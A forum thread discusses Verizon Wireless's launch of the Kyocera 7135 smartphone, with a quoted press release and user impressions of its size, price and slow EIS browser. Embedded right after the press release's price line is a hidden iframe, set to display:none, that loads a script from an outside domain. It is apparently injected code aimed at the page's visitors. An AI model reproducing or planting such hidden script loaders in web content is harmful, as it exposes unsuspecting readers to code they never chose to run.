+ Reply to Thread

Verizon makes it official

I know this news has been eagerly awaited for!

Verizon Wireless Debuts Next-Generation Smartphone
    Wednesday April 30, 1:23 pm ET

BEDMINSTER, N.J., April 30 /PRNewswire/ -- Verizon Wireless, the nation's largest wireless service provider, today announced the Kyocera 7135 Smartphone, the widely anticipated successor to the QCP(TM) 6035 Smartphone, is available in Verizon Wireless' 1,200 Communications Stores and online at www.verizonwireless.com. The Kyocera 7135 from Verizon Wireless is a compact, clamshell convergent device, rich with functionality. Hot off the runway, the Kyocera 7135 is Express Network(SM)-enabled, has a high-resolution screen with 65,000 colors, and an MP3 player.

For someone who relies on wireless communication to stay in touch, the Kyocera 7135 incorporates a speakerphone and voice-activated dialing to make hands-free voice conversations easy to manage. Those who like to communicate discreetly and quietly will appreciate the silent vibrating alert and two-way text messaging capabilities to use Verizon Wireless' TXT Messaging service. Road warriors who depend on e-mail will rely on the 7135 to provide a wireless high-speed connection to e-mail. Palm OS fans will value the thousands of Palm OS applications that can be accessed from the 7135.

For $499.99 with a two-year contract, customers can purchase the Kyocera 7135 and start living with the freedom of having access to multiple voice and data capabilities in one device.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Is this the first VZ release on a Wednesday?

I was just at the Verizon Store here in New York City and they had one demo unit on display. The unit was not working but had a number of curious viewers. They were discussing the various issues like size and quality. That's when I pull out my unit...they had their tongues on the floor. I then proceeded to open up the movie scene of the lobby shootout from the "Matrix" and they were sold. Just converted 2 new buyers. It's the phone that sells itself.

It's on the web site NJ zips...
    The one who dies with the most toys WINS :-)

Originally posted by frenzytom
    I was just at the Verizon Store here in New York City and they had one demo unit on display. The unit was not working but had a number of curious viewers. They were discussing the various issues like size and quality. That's when I pull out my unit...they had their tongues on the floor. I then proceeded to open up the movie scene of the lobby shootout from the "Matrix" and they were sold. Just converted 2 new buyers. It's the phone that sells itself.
    Good work frenzytom! :clap :p
    Please visit my picture site: Robert-O-Rama :)

Thanks patchs for keeping on top of that newswire!
    --Jazz--

god damn! finally!

jeh
    Strangely, the 7135 has now disappeared from their website, at least in my view of it.

i went to my local verizon store yesterday, and it was indeed there. i was kind of disappointed by it's size. the thing is a bit of a brick. it didnt' feel good in my front pocket. i guess i'm spoiled by my palm Vx. i may still get it though.

Brick-schmick!!!

I mean, honestly, when have you ever seen a brick that size??? Seriously.
    ~'kito
    pdaPhoneHome Moderator

Finally got to play with the Precious

Verizon store in Carson, CA had a dummy 7135 on the shelf and I asked if they had the real deal in the store. They apparently had just gotten it in.

Got to check it out and am very impressed. Size is okay by me.

The 14.4 data speed (didn't have Express set up on it yet) is waaay too slow for my taste (viewed Yahoo News and Yahoo Mail with no graphics), so I may have to opt for Express Network. But folks are saying that Express still ain't much faster?

Anyhow, the phone is gonna be bought ASAP!!

Cheers, y'all
    "Those who cast the votes decide nothing, those who count the votes decide everything."

Re: Finally got to play with the Precious

Originally posted by Felt-Dawg
    The 14.4 data speed (didn't have Express set up on it yet) is waaay too slow for my taste (viewed Yahoo News and Yahoo Mail with no graphics)
    Were you using the EIS browser? If so, that browser is just slow period, and doesn't give a fair representation of the speed of the connection, whether it's QNC or EN.
    Please visit my picture site: Robert-O-Rama :)

You're right, I was using EIS.
    "Those who cast the votes decide nothing, those who count the votes decide everything."

Lawd, lawd, Felt-Dawg. EIS is intolerably slow!!! It is a waste of valuable ROM space, IMO. Good thing there is Xiino, Blazer, and Avantgo to be had for graphics.

Methinks EIS is a plan minute-killer application then...Sort of like WAP. Slow for no good reason... Good thing my R&D today was on Verizon's dime.

Lesson learned.

Cheer's, y'all